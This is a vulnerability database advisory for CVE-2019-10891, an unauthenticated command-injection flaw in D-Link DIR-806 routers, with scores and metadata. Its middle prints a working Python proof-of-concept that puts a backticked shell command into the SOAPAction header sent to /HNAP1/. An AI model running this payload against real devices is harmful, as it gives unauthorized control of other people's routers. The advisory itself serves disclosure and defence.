CVSS Meta Temp Score | Current Exploit Price (≈) | CTI Interest Score |
---|---|---|
8.7 | $0-$5k | 0.00 |
A vulnerability, which was classified as critical, was found in D-Link DIR-806 (Router Operating System) (affected version not known). This affects some unknown functionality. The manipulation as part of a HTTP Header leads to a code injection vulnerability. CWE is classifying the issue as CWE-94. The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. This is going to have an impact on confidentiality, integrity, and availability. The summary by CVE is:
D-Link DIR-806 devices allow remote attackers to execute arbitrary shell commands via a trailing substring of an HTTP header that has "SOAPAction: http://purenetworks.com/HNAP1/GetDeviceSettings/" at the beginning.
The weakness was shared 09/06/2019. This vulnerability is uniquely identified as CVE-2019-10891 since 04/05/2019. The exploitability is told to be easy. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. Technical details are unknown but a public exploit is available. The attack technique deployed by this issue is T1059 according to MITRE ATT&CK.
After 4 days, there has been an exploit disclosed. The exploit is shared for download at vuldb.com. It is declared as proof-of-concept. We expect the 0-day to have been worth approximately $5k-$25k. The code used by the exploit is:
from pwn import * import requests import sys data="<?xml version=\"1.0\" encoding=\"UTF-8\"?>\ <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" soap:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\ <soap:Body>\ <GetWanSettings xmlns=\"http://purenetworks.com/HNAP1/\">\ </GetWanSettings>\ </soap:Body>\ </soap:Envelope>" if __name__=="__main__": cmd="reboot" #the shell you want execv,it can't include "/" fake_cmd="http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`" %cmd print fake_cmd header = { 'SOAPAction' : fake_cmd, 'Cookie' : "uid=LS32Srlx8N", 'Content-Type' : 'text/xml', 'Content-Length': str(len(data)) } url="http://192.168.0.1/HNAP1/" r=requests.post(url=url,headers=header,data=data) print r.content
There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.
The entry VDB-141340 is related to this item.
Product
Type
Vendor
Name
License
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Reliability: 🔍
CVSSv3
VulDB Meta Base Score: 9.0VulDB Meta Temp Score: 8.7
VulDB Base Score: 7.3
VulDB Temp Score: 6.6
VulDB Vector: 🔍
VulDB Reliability: 🔍
NVD Base Score: 9.8
NVD Vector: 🔍
CNA Base Score: 9.8
CNA Vector: 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
Vector | Complexity | Authentication | Confidentiality | Integrity | Availability |
---|---|---|---|---|---|
unlock | unlock | unlock | unlock | unlock | unlock |
unlock | unlock | unlock | unlock | unlock | unlock |
unlock | unlock | unlock | unlock | unlock | unlock |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍
NVD Base Score: 🔍
Exploiting
Class: Code injectionCWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
Local: No
Remote: Yes
Availability: 🔍
Access: Public
Status: Proof-of-Concept
Download: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Price Prediction: 🔍
Current Price Estimation: 🔍
0-Day | unlock | unlock | unlock | unlock |
---|---|---|---|---|
Today | unlock | unlock | unlock | unlock |
Threat Intelligence
Interest: 🔍Active Actors: 🔍
Active APT Groups: 🔍
Countermeasures
Recommended: no mitigation knownStatus: 🔍
0-Day Time: 🔍
Exploit Delay Time: 🔍
Timeline
04/05/2019 🔍09/06/2019 🔍
09/07/2019 🔍
09/09/2019 🔍
01/09/2025 🔍
Sources
Vendor: dlink.comAdvisory: github.com
Status: Not defined
CVE: CVE-2019-10891 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013
See also: 🔍
Entry
Created: 09/07/2019 08:04 AMUpdated: 01/09/2025 09:43 PM
Changes: 09/07/2019 08:04 AM (41), 08/23/2020 05:28 PM (18), 12/13/2023 02:46 PM (4), 01/06/2025 06:31 PM (19), 01/09/2025 09:43 PM (12)
Complete: 🔍
Cache ID: 18:30A:40
No comments yet. Languages: en.
Please log in to comment.